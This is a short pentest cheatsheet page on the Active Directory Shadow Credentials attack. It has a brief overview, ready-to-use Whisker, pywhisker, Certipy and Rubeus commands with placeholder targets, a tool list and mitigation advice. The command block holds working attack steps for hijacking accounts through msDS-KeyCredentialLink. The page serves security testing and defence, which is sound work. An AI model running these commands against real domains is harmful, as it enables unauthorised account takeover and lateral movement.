Shadow Credentials
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
Shadow Credentials attack allows an attacker with GenericWrite/GenericAll over an AD object to add KeyCredentialLink attributes to it. This creates alternate credentials (certificate-based) that the attacker can authenticate with.
The attack works by adding a certificate public key to the target object's msDS-KeyCredentialLink attribute, then using the corresponding private key to authenticate via PKINIT.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Shadow Credentials:
Whisker.exe add /target:targetuser$ /domain:domain.local /path:cert.pfx /password:Pass123pywhisker -d domain.local -u attacker -p password --target targetuser$ --action add --filename cert.pfxcertipy shadow auto -u attacker@domain.local -p 'password' -account targetuser$ -dc-ip 10.10.10.10Rubeus.exe asktgt /user:targetuser$ /certificate:cert.pfx /password:Pass123 /pttTools & Techniques
Recommended tools for Shadow Credentials:
- Whisker: .NET shadow credentials tool
- pywhisker: Python shadow credentials tool
- Certipy shadow: automated shadow credentials attack
- Rubeus: authenticate with shadow certificate
- Requires: GenericWrite/GenericAll on target object
Prevention & Mitigation
Security recommendations to prevent Shadow Credentials:
- Restrict who has GenericWrite/GenericAll on sensitive objects
- Monitor msDS-KeyCredentialLink attribute modifications
- Use Protected Users security group to prevent PKINIT
- Audit for addition of KeyCredentialLink attributes
References
Additional resources: